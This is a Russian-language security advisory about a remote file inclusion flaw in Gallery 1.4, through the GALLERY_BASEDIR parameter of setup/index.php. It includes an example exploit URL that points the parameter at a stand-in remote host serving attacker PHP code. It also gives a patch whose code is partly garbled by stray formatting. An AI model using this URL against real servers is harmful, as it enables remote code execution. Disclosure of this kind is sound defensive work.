Дата публикации: | 13.10.2003 |
Всего просмотров: | 1434 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Gallery 1.4
Описание: Уязвимость обнаружена в Gallery. Удаленный атакующий может выполнить произвольный PHP код на уязвимом сервере. Переменная GALLERY_BASEDIR в сценарии index.php включает сценарий util.php, не проверяя его фактическое местоположение. В результате удаленный атакующий может включить произвольный PHP код, расположенный на удаленном сервере, который будет выполнен на уязвимом сервере с привилегиями Web сервера. Пример/Эксплоит: http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/ где http://tester/util.php Решение: Внесите следующее исправление в сценарий index.php в каталоге setup: if (!isset($GALLERY_BASEDIR)) { $GALLERY_BASEDIR = '../'; } <pre> На <pre> $GALLERY_BASEDIR = '../'; |
|
Ссылки: | Gallery 1.4 including file vulnerability |